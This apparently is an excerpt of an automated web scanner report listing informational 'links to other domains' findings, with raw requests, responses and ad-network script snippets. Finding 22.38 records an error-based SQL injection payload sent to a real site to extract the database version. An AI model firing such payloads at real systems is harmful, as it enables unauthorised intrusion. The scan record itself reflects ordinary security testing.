...[SNIP]...
<li> <a href="http://mgpublications.com/news/20803" target="_blank" class="smi-inf-img"><img width="75" height="75" src="http://smiimg.dt00.net/smi/2010/07/2010073024-75x75.jpg">
...[SNIP]...
<div class="smi-inf-box"> <a href="http://mgpublications.com/news/20803" target="_blank">........................ ................ ................ ................ .......... .............. .. ........ .......... (........)</a>
...[SNIP]...
<li> <a href="http://mgpublications.com/news/31765" target="_blank" class="smi-inf-img"><img width="75" height="75" src="http://smiimg.dt00.net/smi/2011/01/20110112mini-75x75.jpg">
...[SNIP]...
<div class="smi-inf-box"> <a href="http://mgpublications.com/news/31765" target="_blank">................ .... .............. ................!</a>
...[SNIP]...
<li> <a href="http://mgpublications.com/news/4489" target="_blank" class="smi-inf-img"><img width="75" height="75" src="http://imgn.dt00.net/288/288120_b.jpg">
...[SNIP]...
<div class="smi-inf-box"> <a href="http://mgpublications.com/news/4489" target="_blank">...................... .............. ...................... (..........)</a>
...[SNIP]...
<li> <a href="http://mgpublications.com/news/2543" target="_blank" class="smi-inf-img"><img width="75" height="75" src="http://imgn.dt00.net/171/171296_b.jpg">
...[SNIP]...
<div class="smi-inf-box"> <a href="http://mgpublications.com/news/2543" target="_blank">.............. ................ ................ .. ............ (..........)</a>
...[SNIP]...
<li> <a href="http://mgpublications.com/news/36653" target="_blank" class="smi-inf-img"><img width="75" height="75" src="http://smiimg.dt00.net/smi/2011/04/20110401961-75x75.jpg">
...[SNIP]...
<div class="smi-inf-box"> <a href="http://mgpublications.com/news/36653" target="_blank">............ ................: .. .......... ...................... ..................!</a>
...[SNIP]...
<li> <a href="http://mgpublications.com/news/19679" target="_blank" class="smi-inf-img"><img width="75" height="75" src="http://smiimg.dt00.net/smi/2010/07/2010070147311636_1249839344_1236164273_i10paradoxatlantidaf10_640-75x75.jpg">
...[SNIP]...
<div class="smi-inf-box"> <a href="http://mgpublications.com/news/19679" target="_blank">........................ ................: .................. ...................... .... ......</a>
...[SNIP]...
<li> <a href="http://mgpublications.com/news/36386" target="_blank" class="smi-inf-img"><img width="75" height="75" src="http://smiimg.dt00.net/smi/2011/03/2011032520101209chris43-75x75.jpg">
...[SNIP]...
<div class="smi-inf-box"> <a href="http://mgpublications.com/news/36386" target="_blank">................ .............. .................. .. ........................ ........</a>
...[SNIP]...
<li> <a href="http://mgpublications.com/news/26548" target="_blank" class="smi-inf-img"><img width="75" height="75" src="http://smiimg.dt00.net/smi/2010/10/20101021131-75x75.jpg">
...[SNIP]...
<div class="smi-inf-box"> <a href="http://mgpublications.com/news/26548" target="_blank">...... ............ ...... ............? ...... .................. ............ .......... .............. (........)</a>
...[SNIP]...
<li> <a href="http://mgpublications.com/news/1731" target="_blank" class="smi-inf-img"><img width="75" height="75" src="http://imgn.dt00.net/57/57823_b.jpg">
...[SNIP]...
<div class="smi-inf-box"> <a href="http://mgpublications.com/news/1731" target="_blank">.............. .................. ...... .... .......................... (........)</a>
...[SNIP]...
<li> <a href="http://mgpublications.com/news/34328" target="_blank" class="smi-inf-img"><img width="75" height="75" src="http://smiimg.dt00.net/smi/2011/02/20110220368895_11-75x75.jpg">
...[SNIP]...
<div class="smi-inf-box"> <a href="http://mgpublications.com/news/34328" target="_blank">.............. .............., .............. ........ 2600 ...... .......... (........)</a>
...[SNIP]...
<li> <a href="http://mgpublications.com/news/36661" target="_blank" class="smi-inf-img"><img width="75" height="75" src="http://smiimg.dt00.net/smi/2011/04/20110401gallery3_b2f375e8de5fa9f50d040546ed2ab9b41-75x75.jpg">
...[SNIP]...
<div class="smi-inf-box"> <a href="http://mgpublications.com/news/36661" target="_blank">............ .............., ................ .... .............. ............ (........)</a>
...[SNIP]...
<li> <a href="http://mgpublications.com/news/37143" target="_blank" class="smi-inf-img"><img width="75" height="75" src="http://smiimg.dt00.net/smi/2011/04/20110414khlopin-75x75.jpg">
...[SNIP]...
<div class="smi-inf-box"> <a href="http://mgpublications.com/news/37143" target="_blank">.................. ............ ...., ...... 150 ...... .... .......... .............. ............</a>
...[SNIP]...
<li> <a href="http://mgpublications.com/news/34333" target="_blank" class="smi-inf-img"><img width="75" height="75" src="http://smiimg.dt00.net/smi/2011/02/20110220371001_1-75x75.jpg">
...[SNIP]...
<div class="smi-inf-box"> <a href="http://mgpublications.com/news/34333" target="_blank">........ .......... .............. .............. .......... (........)</a>
...[SNIP]...
<li> <a href="http://mgpublications.com/news/6218" target="_blank" class="smi-inf-img"><img width="75" height="75" src="http://imgn.dt00.net/344/344198_b.jpg">
...[SNIP]...
<div class="smi-inf-box"> <a href="http://mgpublications.com/news/6218" target="_blank">................ .......... ................ ..................!</a>
...[SNIP]...
<li> <a href="http://mgpublications.com/news/29388" target="_blank" class="smi-inf-img"><img width="75" height="75" src="http://smiimg.dt00.net/smi/2010/12/20101201mini_video-alena-berezovskaja-ja-s-zhenoj-prezidenta-89cc-75x75.jpg">
...[SNIP]...
<div class="smi-inf-box"> <a href="http://mgpublications.com/news/29388" target="_blank">............ ...... .................. "................" .................. ........ (........)</a>
...[SNIP]...

22.33. http://jsc.dt00.net/w/e/webalta.ru.1001.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jsc.dt00.net
Path:	/w/e/webalta.ru.1001.js

Issue detail

The page was loaded from a URL containing a query string:

http://jsc.dt00.net/w/e/webalta.ru.1001.js?t=1113259

The response contains the following links to other domains:

http://www.marketgid.com/ghits/'+n[1]+'/i/5925/pp/'+MGD001001+'/'+MGDZ1001+'/k/'+n[6]+'
http://www.marketgid.com/pnews/'+id+'/i/7269/pp/'+MGD001001+'/'+MGDZ1001+'/

Request

GET /w/e/webalta.ru.1001.js?t=1113259 HTTP/1.1
Host: jsc.dt00.net
Proxy-Connection: keep-alive
Referer: http://webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:20:09 GMT
Content-Type: application/x-javascript
Content-Length: 10274
Last-Modified: Fri, 14 Jan 2011 22:38:43 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Wed, 25 May 2011 14:20:09 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes

/*marketgid.comV2.1*/var MGDQ1001 = document.getElementById('MarketGidComposite1001'); function MGD011001(MGD02){ if (!document.cookie){ switch (MGD02) { case 'MG_type': case 'MG_id': return null; bre
...[SNIP]...
<div class="mcimage7269"><a target="_blank" href="http://www.marketgid.com/pnews/'+id+'/i/7269/pp/'+MGD001001+'/'+MGDZ1001+'/#k1001" ><img class="mcimage7269" width="75" height="75" src="http://imgn.dt00.net/'+Math.floor(id/1000)+'/'+id+'_m'+ext+'" />
...[SNIP]...
<div class="mctitle7269"><a target="_blank" href="http://www.marketgid.com/pnews/'+id+'/i/7269/pp/'+MGD001001+'/'+MGDZ1001+'/#k1001" class="mctitle7269">'+title+'</a>
...[SNIP]...
<div class="mcimage5925"><a target="_blank" href="http://www.marketgid.com/ghits/'+n[1]+'/i/5925/pp/'+MGD001001+'/'+MGDZ1001+'/k/'+n[6]+'#k1001" ><img class="mcimage5925" width="75" height="75"src="http://imgg.dt00.net/'+Math.floor(n[1]/1000)+'/'+n[1]+'_m'+(n[2]==2?'.gif':'.jpg')+'" />
...[SNIP]...
<div class="mctitle5925"><a target="_blank" href="http://www.marketgid.com/ghits/'+n[1]+'/i/5925/pp/'+MGD001001+'/'+MGDZ1001+'/k/'+n[6]+'#k1001" class="mctitle5925">'+MGD065925(n[3])+'</a>
...[SNIP]...

22.34. http://jsc.dt00.net/w/e/webalta.ru.1668.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jsc.dt00.net
Path:	/w/e/webalta.ru.1668.js

Issue detail

The page was loaded from a URL containing a query string:

http://jsc.dt00.net/w/e/webalta.ru.1668.js?t=1113259

The response contains the following links to other domains:

http://www.marketgid.com/ghits/'+n[1]+'/i/6906/pp/'+MGD001668+'/'+MGDZ1668+'/k/'+n[6]+'
http://www.marketgid.com/pnews/'+id+'/i/8504/pp/'+MGD001668+'/'+MGDZ1668+'/

Request

GET /w/e/webalta.ru.1668.js?t=1113259 HTTP/1.1
Host: jsc.dt00.net
Proxy-Connection: keep-alive
Referer: http://auto.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:20:13 GMT
Content-Type: application/x-javascript
Content-Length: 10491
Last-Modified: Tue, 28 Dec 2010 09:23:54 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Wed, 25 May 2011 14:20:13 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes

/*marketgid.comV2.1*/var MGDQ1668 = document.getElementById('MarketGidComposite1668'); function MGD011668(MGD02){ if (!document.cookie){ switch (MGD02) { case 'MG_type': case 'MG_id': return null; bre
...[SNIP]...
<div class="mcimage8504"><a target="_blank" href="http://www.marketgid.com/pnews/'+id+'/i/8504/pp/'+MGD001668+'/'+MGDZ1668+'/#k1668" ><img class="mcimage8504" width="100" height="75" src="http://imgn.dt00.net/'+Math.floor(id/1000)+'/'+id+'_t100'+ext+'" />
...[SNIP]...
<div class="mctitle8504"><a target="_blank" href="http://www.marketgid.com/pnews/'+id+'/i/8504/pp/'+MGD001668+'/'+MGDZ1668+'/#k1668" class="mctitle8504">'+title+'</a>
...[SNIP]...
<div class="mcimage6906"><a target="_blank" href="http://www.marketgid.com/ghits/'+n[1]+'/i/6906/pp/'+MGD001668+'/'+MGDZ1668+'/k/'+n[6]+'#k1668" ><img class="mcimage6906" width="100" height="75"src="http://imgg.dt00.net/'+Math.floor(n[1]/1000)+'/'+n[1]+'_t100'+(n[2]==2?'.gif':'.jpg')+'" />
...[SNIP]...
<div class="mctitle6906"><a target="_blank" href="http://www.marketgid.com/ghits/'+n[1]+'/i/6906/pp/'+MGD001668+'/'+MGDZ1668+'/k/'+n[6]+'#k1668" class="mctitle6906">'+MGD066906(n[3])+'</a>
...[SNIP]...

22.35. http://jsg.dt00.net/m/a/marketgid.com.i5.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jsg.dt00.net
Path:	/m/a/marketgid.com.i5.js

Issue detail

The page was loaded from a URL containing a query string:

http://jsg.dt00.net/m/a/marketgid.com.i5.js?t=1113

The response contains the following link to another domain:

http://www.marketgid.com/ghits/'+n[1]+'/i/310/pp/'+MGD00+'/'+MGDZ+'/k/'+n[6]+'

Request

GET /m/a/marketgid.com.i5.js?t=1113 HTTP/1.1
Host: jsg.dt00.net
Proxy-Connection: keep-alive
Referer: http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:37:23 GMT
Content-Type: application/x-javascript
Content-Length: 4586
Last-Modified: Mon, 21 Mar 2011 23:11:33 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Wed, 25 May 2011 14:37:23 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes

/*marketgid.comV7.9*/ function MGD01310(MGD02){ if (!document.cookie){ document.cookie="MG_310=1;path=/"; if (!document.cookie){ var MGDA=new Date(); return (MGDA.getSeconds()%20+1); } else return 1-1
...[SNIP]...
<div class="hit"> <a target="_blank" href="http://www.marketgid.com/ghits/'+n[1]+'/i/310/pp/'+MGD00+'/'+MGDZ+'/k/'+n[6]+'" class="desc">'+MGD07310(n[4])+'</a> <a target="_blank" href="http://www.marketgid.com/ghits/'+n[1]+'/i/310/pp/'+MGD00+'/'+MGDZ+'/k/'+n[6]+'" class="img"><img width="200" height="200"src="http://imgg.dt00.net/'+Math.floor(n[1]/1000)+'/'+n[1]+'_vb'+(n[2]==2?'.gif':'.jpg')+'" /></a> <a target="_blank" href="http://www.marketgid.com/ghits/'+n[1]+'/i/310/pp/'+MGD00+'/'+MGDZ+'/k/'+n[6]+'" class="title">'+MGD06310(n[3])+'</a> <a target="_blank" href="http://www.marketgid.com/ghits/'+n[1]+'/i/310/pp/'+MGD00+'/'+MGDZ+'/k/'+n[6]+'" class="price">'+n[7]+'</a>
...[SNIP]...

22.36. http://jsg.dt00.net/m/a/marketgid.com.i59.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jsg.dt00.net
Path:	/m/a/marketgid.com.i59.js

Issue detail

The page was loaded from a URL containing a query string:

http://jsg.dt00.net/m/a/marketgid.com.i59.js?t=1113

The response contains the following link to another domain:

http://www.marketgid.com/ghits/'+n[1]+'/i/1063/pp/'+MGD00+'/'+MGDZ+'/k/'+n[6]+'

Request

GET /m/a/marketgid.com.i59.js?t=1113 HTTP/1.1
Host: jsg.dt00.net
Proxy-Connection: keep-alive
Referer: http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:36:22 GMT
Content-Type: application/x-javascript
Content-Length: 4658
Last-Modified: Mon, 21 Mar 2011 23:12:01 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Wed, 25 May 2011 14:36:22 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes

/*marketgid.comV7.9*/ function MGD011063(MGD02){ if (!document.cookie){ document.cookie="MG_1063=1;path=/"; if (!document.cookie){ var MGDA=new Date(); return (MGDA.getSeconds()%20+1); } else return 0
...[SNIP]...
<div class="hit"> <a target="_blank" href="http://www.marketgid.com/ghits/'+n[1]+'/i/1063/pp/'+MGD00+'/'+MGDZ+'/k/'+n[6]+'" class="desc">'+MGD071063(n[4])+'</a> <a target="_blank" href="http://www.marketgid.com/ghits/'+n[1]+'/i/1063/pp/'+MGD00+'/'+MGDZ+'/k/'+n[6]+'" class="img"><img width="200" height="200"src="http://imgg.dt00.net/'+Math.floor(n[1]/1000)+'/'+n[1]+'_vb'+(n[2]==2?'.gif':'.jpg')+'" /></a> <a target="_blank" href="http://www.marketgid.com/ghits/'+n[1]+'/i/1063/pp/'+MGD00+'/'+MGDZ+'/k/'+n[6]+'" class="title">'+MGD061063(n[3])+'</a> <a target="_blank" href="http://www.marketgid.com/ghits/'+n[1]+'/i/1063/pp/'+MGD00+'/'+MGDZ+'/k/'+n[6]+'" class="price">'+n[7]+'</a>
...[SNIP]...

22.37. http://learn.shavlik.com/shavlik/index.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://learn.shavlik.com
Path:	/shavlik/index.cfm

Issue detail

The page was loaded from a URL containing a query string:

http://learn.shavlik.com/shavlik/index.cfm?pg=374

The response contains the following link to another domain:

http://www.burstnet.com/enlightn/7214/98DD/

Request

GET /shavlik/index.cfm?pg=374 HTTP/1.1
Host: learn.shavlik.com
Proxy-Connection: keep-alive
Referer: http://learn.shavlik.com/shavlik/index.cfm?m=1112&pg=697&h=0&hp=697&utm_term=vulnerability%20management&utm_campaign=PatchManagement&utm_mt=e&gclid=CPC_jKTPt6gCFUh-5QodsROzEA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=799534; CFTOKEN=57697702; __utmz=225610631.1303732848.1.1.utmgclid=CPC_jKTPt6gCFUh-5QodsROzEA|utmccn=PatchManagement|utmcmd=(not%20set)|utmctr=vulnerability%20management; __utma=225610631.313706594.1303732848.1303732848.1303732848.1; __utmc=225610631; __utmb=225610631.2.10.1303732848

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 25 Apr 2011 12:16:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

...[SNIP]...
<body>
<img src="http://www.burstnet.com/enlightn/7214//98DD/" width="0" height="0" border="0">
...[SNIP]...

22.38. http://learn.shavlik.com/shavlik/index.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://learn.shavlik.com
Path:	/shavlik/index.cfm

Issue detail

The page was loaded from a URL containing a query string:

http://learn.shavlik.com/shavlik/index.cfm?m=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2C(SELECT%20@@VERSION)%2CCHAR(95)%2CCHAR(33)%2CCHAR(64))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))&pg=697&h=0&hp=697&utm_term=vulnerability%20management&utm_campaign=PatchManagement&utm_mt=e&gclid=CPC_jKTPt6gCFUh-5QodsROzEA

The response contains the following links to other domains:

http://www.macromedia.com/go/proddoc_getdoc
http://www.macromedia.com/support/coldfusion/

Request

GET /shavlik/index.cfm?m=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2C(SELECT%20@@VERSION)%2CCHAR(95)%2CCHAR(33)%2CCHAR(64))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))&pg=697&h=0&hp=697&utm_term=vulnerability%20management&utm_campaign=PatchManagement&utm_mt=e&gclid=CPC_jKTPt6gCFUh-5QodsROzEA HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: learn.shavlik.com
Cookie: CFID=799689; CFTOKEN=67476078
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 25 Apr 2011 12:26:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8

...[SNIP]...
<li>Check the <a href='http://www.macromedia.com/go/proddoc_getdoc' target="new">ColdFusion documentation</a>
...[SNIP]...
<li>Search the <a href='http://www.macromedia.com/support/coldfusion/' target="new">Knowledge Base</a>
...[SNIP]...

22.39. http://limg.imgsmail.ru/r/js/splash.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://limg.imgsmail.ru
Path:	/r/js/splash.js

Issue detail

The page was loaded from a URL containing a query string:

http://limg.imgsmail.ru/r/js/splash.js?7

The response contains the following link to another domain:

http://go.mail.ru/search?q='+item.site+'&ce=1

Request

GET /r/js/splash.js?7 HTTP/1.1
Host: limg.imgsmail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 25 Apr 2011 14:25:16 GMT
Content-Type: application/x-javascript
Last-Modified: Thu, 20 Jan 2011 13:37:56 GMT
Connection: keep-alive
Expires: Mon, 02 May 2011 14:25:16 GMT
Cache-Control: max-age=604800
Content-Length: 141559

/*
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-02-
...[SNIP]...
);
       tbody = createElement("tbody");
       while (item = res[i++]) {
           (function(str){
               if (j && !str && item.site) {
                   item.site = item.site.replace(/^http:\/\//,'').replace(/\/$/,'');
                   str = '<a onclick="return false;" href="http://go.mail.ru/search?q='+item.site+'&ce=1" title="....... .. '+item.site+'">'+item.site+'</a>
...[SNIP]...

22.40. http://nguard.com/vulnerability-assessment/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://nguard.com
Path:	/vulnerability-assessment/

Issue detail

The page was loaded from a URL containing a query string:

http://nguard.com/vulnerability-assessment/?gclid=CM2C9p3Pt6gCFUOo4AoduRviBQ

The response contains the following link to another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js

Request

GET /vulnerability-assessment/?gclid=CM2C9p3Pt6gCFUOo4AoduRviBQ HTTP/1.1
Host: nguard.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=74935565.1303732835.1.1.utmgclid=CM2C9p3Pt6gCFUOo4AoduRviBQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=74935565.1810353086.1303732835.1303732835.1303732835.1; __utmc=74935565

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:52:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 19622

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

22.41. http://pixel.fetchback.com/serve/fb/pdc previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.fetchback.com
Path:	/serve/fb/pdc

Issue detail

The page was loaded from a URL containing a query string:

http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=719

The response contains the following links to other domains:

http://ad.adtegrity.net/pixel?id=494024&t=2
http://ad.bannerconnect.net/pixel?id=495608&t=2
http://ad.doubleclick.net/activity;src=1461286;dcnet=4155;boom=34879;sz=1x1;ord=1?
http://ad.doubleclick.net/activity;src=1801246;dcnet=4591;boom=23534;sz=1x1;ord=1?
http://ad.trafficmp.com/a/bpix?adv=652&id=1005&r=
http://ad.yieldmanager.com/pixel?id=478454&t=2
http://d7.zedo.com/img/bh.gif?n=826&g=20&a=798&s=$t&l=1&t=i&e=1
http://idcs.interclick.com/Segment.aspx?sid=ab470e57-8d67-4a28-b9b1-aaf3331f5214
http://pixel.rubiconproject.com/tap.php?v=2939|1
http://segment-pixel.invitemedia.com/pixel?pixelID=13893&partnerID=91&clientID=2693&key=segment
http://segment-pixel.invitemedia.com/pixel?pixelID=13893&partnerID=91&clientID=2693&key=segment&returnType=js
http://segment-pixel.invitemedia.com/pixel?pixelID=13896&partnerID=91&clientID=2694&key=segment
http://segment-pixel.invitemedia.com/pixel?pixelID=13896&partnerID=91&clientID=2694&key=segment&returnType=js
http://segment-pixel.invitemedia.com/pixel?pixelID=13899&partnerID=91&clientID=2695&key=segment
http://segment-pixel.invitemedia.com/pixel?pixelID=13899&partnerID=91&clientID=2695&key=segment&returnType=js
http://segment-pixel.invitemedia.com/pixel?pixelID=13902&partnerID=91&clientID=2696&key=segment
http://segment-pixel.invitemedia.com/pixel?pixelID=13902&partnerID=91&clientID=2696&key=segment&returnType=js
http://segment-pixel.invitemedia.com/pixel?pixelID=6551&partnerID=91&clientID=1838&key=segment&returnType=js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:41:11 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cmp=1_1303742471_10164:0_10638:0_10640:0_10641:0_1437:0_1660:562799; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: uid=1_1303742471_1303179323923:6792170478871670; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: kwd=1_1303742471_11317:0_11717:0_11718:0_11719:0; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: sit=1_1303742471_719:30:0_2451:50899:45799_3236:208862:208744_782:563148:562799; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: cre=1_1303742471; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: bpd=1_1303742471; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: apd=1_1303742471; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: scg=1_1303742471; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: ppd=1_1303742471; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: afl=1_1303742471; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 25 Apr 2011 14:41:11 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 4418


<![if !IE 6]>
<script language='javascript' type='text/javascript'>
function timeout(){location.replace('http://pixel.fetchback.com/timeout.html');}
setTimeout(time
...[SNIP]...

<img width=1 height=1 border=0 src="http://ad.trafficmp.com/a/bpix?adv=652&id=1005&r=">

<script src="http://segment-pixel.invitemedia.com/pixel?pixelID=6551&partnerID=91&clientID=1838&key=segment&returnType=js"></script>
...[SNIP]...
<noscript>
<img src="http://ad.doubleclick.net/activity;src=1461286;dcnet=4155;boom=34879;sz=1x1;ord=1?"width="1" height="1" border="0" alt="">
</noscript>

<img src="http://pixel.rubiconproject.com/tap.php?v=2939|1" border="0" width="1" height="1">

<script src="http://segment-pixel.invitemedia.com/pixel?pixelID=13893&partnerID=91&clientID=2693&key=segment&returnType=js"></script>
<noscript>
<img src="http://segment-pixel.invitemedia.com/pixel?pixelID=13893&partnerID=91&clientID=2693&key=segment" width="1" height="1" />
</noscript>
...[SNIP]...

<script src="http://segment-pixel.invitemedia.com/pixel?pixelID=13899&partnerID=91&clientID=2695&key=segment&returnType=js"></script>
<noscript>
<img src="http://segment-pixel.invitemedia.com/pixel?pixelID=13899&partnerID=91&clientID=2695&key=segment" width="1" height="1" />
</noscript>

<img src="http://d7.zedo.com/img/bh.gif?n=826&g=20&a=798&s=$t&l=1&t=i&e=1" width="1" height="1" border="0" >

<script src="http://segment-pixel.invitemedia.com/pixel?pixelID=13896&partnerID=91&clientID=2694&key=segment&returnType=js"></script>
<noscript>
<img src="http://segment-pixel.invitemedia.com/pixel?pixelID=13896&partnerID=91&clientID=2694&key=segment" width="1" height="1" />
</noscript>

<img src="http://ad.adtegrity.net/pixel?id=494024&t=2" width="1" height="1" />

<script src="http://segment-pixel.invitemedia.com/pixel?pixelID=13902&partnerID=91&clientID=2696&key=segment&returnType=js"></script>
<noscript>
<img src="http://segment-pixel.invitemedia.com/pixel?pixelID=13902&partnerID=91&clientID=2696&key=segment" width="1" height="1" />
</noscript>
...[SNIP]...

<img src="http://ad.yieldmanager.com/pixel?id=478454&t=2" width="1" height="1" />

...[SNIP]...
<noscript>
<img src="http://ad.doubleclick.net/activity;src=1801246;dcnet=4591;boom=23534;sz=1x1;ord=1?"width="1" height="1" border="0" alt="">
</noscript>
...[SNIP]...

<img src="http://ad.bannerconnect.net/pixel?id=495608&t=2" width="1" height="1" />

<img src="http://idcs.interclick.com/Segment.aspx?sid=ab470e57-8d67-4a28-b9b1-aaf3331f5214"/>

22.42. http://shopping.netsuite.com/s.nl previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://shopping.netsuite.com
Path:	/s.nl

Issue detail

The page was loaded from a URL containing a query string:

http://shopping.netsuite.com/s.nl?c=438708&sc=3&whence=&qtyadd=1&n=1&mboxSession=1303736347554-914602&ext=T&Submit.x=43&productId=1650&Submit.y=8

The response contains the following links to other domains:

http://www.eset.com/us
http://www.eset.com/us/business/products
http://www.eset.com/us/company
